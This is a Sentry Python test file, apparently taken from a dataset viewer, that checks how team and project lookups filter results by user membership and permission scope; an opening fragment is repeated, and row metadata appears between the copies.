        assert result == [(team, [project2, project])]
class ProjectManagerTest(TestCase):
    """Exercises Project.objects.get_for_user membership and scope checks."""
    def test_simple(self):
        user = User.objects.create(username="foo")
        org = self.create_organization()
        team = self.create_team(organization=org, name="Test")
        project = self.create_project(teams=[team], name="foo")
        project2 = self.create_project(teams=[team], name="baz")
        # NOTE(review): expected order [project2, project] suggests results are
        # ordered by name ("baz" < "foo") -- confirm against the manager.
        # _skip_team_check=True bypasses membership, so even a non-member
        # sees the team's projects; with the check on, a non-member sees none.
        result = Project.objects.get_for_user(team=team, user=user, _skip_team_check=True)
        assert result == [project2, project]
        result = Project.objects.get_for_user(team=team, user=user, _skip_team_check=False)
        assert result == []
        self.create_member(organization=org, user=user, teams=[team])
        # check again after creating member
        result = Project.objects.get_for_user(team=team, user=user, _skip_team_check=True)
        assert result == [project2, project]
        result = Project.objects.get_for_user(team=team, user=user, _skip_team_check=False)
        assert result == [project2, project]
        # test with scope user doesn't have
        result = Project.objects.get_for_user(
            team=team, user=user, _skip_team_check=False, scope="project:write"
        )
        assert result == []
        # check with scope they do have
        result = Project.objects.get_for_user(
            team=team, user=user, _skip_team_check=False, scope="project:read"
        )
        assert result == [project2, project]
| 41.28125 | 93 | 0.671209 | from __future__ import absolute_import
from sentry.models import Group, Project, Team, User
from sentry.testutils import TestCase
class SentryManagerTest(TestCase):
    """Tests for event creation via ``Group.objects.from_kwargs``."""

    def test_valid_only_message(self):
        """An event created from only a message gets sensible defaults."""
        event = Group.objects.from_kwargs(1, message="foo")
        # Use assertEqual: assertEquals is a deprecated unittest alias.
        # The group's last_seen is stamped with the event's datetime.
        self.assertEqual(event.group.last_seen, event.datetime)
        self.assertEqual(event.message, "foo")
        self.assertEqual(event.project_id, 1)
class TeamManagerTest(TestCase):
    """Behaviour of ``Team.objects.get_for_user``."""

    def test_simple(self):
        """A member sees the team they belong to."""
        member = User.objects.create(username="foo")
        organization = self.create_organization()
        team = self.create_team(organization=organization, name="Test")
        self.create_member(organization=organization, user=member, teams=[team])
        assert Team.objects.get_for_user(organization=organization, user=member) == [team]

    def test_invalid_scope(self):
        """An unknown scope yields no teams."""
        member = User.objects.create(username="foo")
        organization = self.create_organization()
        team = self.create_team(organization=organization, name="Test")
        self.create_member(organization=organization, user=member, teams=[team])
        result = Team.objects.get_for_user(
            organization=organization, user=member, scope="idontexist"
        )
        assert result == []

    def test_valid_scope(self):
        """A scope the member holds still returns their teams."""
        member = User.objects.create(username="foo")
        organization = self.create_organization()
        team = self.create_team(organization=organization, name="Test")
        self.create_member(organization=organization, user=member, teams=[team])
        result = Team.objects.get_for_user(
            organization=organization, user=member, scope="project:read"
        )
        assert result == [team]

    def test_user_no_access(self):
        """A user with no membership in the organization sees nothing."""
        member = User.objects.create(username="foo")
        outsider = User.objects.create(username="bar")
        organization = self.create_organization()
        team = self.create_team(organization=organization, name="Test")
        self.create_member(organization=organization, user=member, teams=[team])
        assert Team.objects.get_for_user(organization=organization, user=outsider) == []

    def test_with_projects(self):
        """With ``with_projects=True`` each team is paired with its projects."""
        member = User.objects.create(username="foo")
        organization = self.create_organization()
        team = self.create_team(organization=organization, name="Test")
        self.create_member(organization=organization, user=member, teams=[team])
        project_foo = self.create_project(teams=[team], name="foo")
        project_bar = self.create_project(teams=[team], name="bar")
        result = Team.objects.get_for_user(
            organization=organization, user=member, with_projects=True
        )
        # Projects come back ordered "bar" before "foo".
        assert result == [(team, [project_bar, project_foo])]
class ProjectManagerTest(TestCase):
    """Behaviour of ``Project.objects.get_for_user``."""

    def test_simple(self):
        """Membership and scope both gate which projects are returned."""
        member = User.objects.create(username="foo")
        organization = self.create_organization()
        team = self.create_team(organization=organization, name="Test")
        project_foo = self.create_project(teams=[team], name="foo")
        project_baz = self.create_project(teams=[team], name="baz")
        expected = [project_baz, project_foo]

        # Before membership exists, only the unchecked variant sees projects.
        assert (
            Project.objects.get_for_user(team=team, user=member, _skip_team_check=True)
            == expected
        )
        assert (
            Project.objects.get_for_user(team=team, user=member, _skip_team_check=False)
            == []
        )

        self.create_member(organization=organization, user=member, teams=[team])

        # Once the member is created, both variants return the projects.
        assert (
            Project.objects.get_for_user(team=team, user=member, _skip_team_check=True)
            == expected
        )
        assert (
            Project.objects.get_for_user(team=team, user=member, _skip_team_check=False)
            == expected
        )

        # A scope the member lacks filters everything out ...
        assert (
            Project.objects.get_for_user(
                team=team, user=member, _skip_team_check=False, scope="project:write"
            )
            == []
        )
        # ... while a scope they do hold keeps the projects visible.
        assert (
            Project.objects.get_for_user(
                team=team, user=member, _skip_team_check=False, scope="project:read"
            )
            == expected
        )
| true | true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.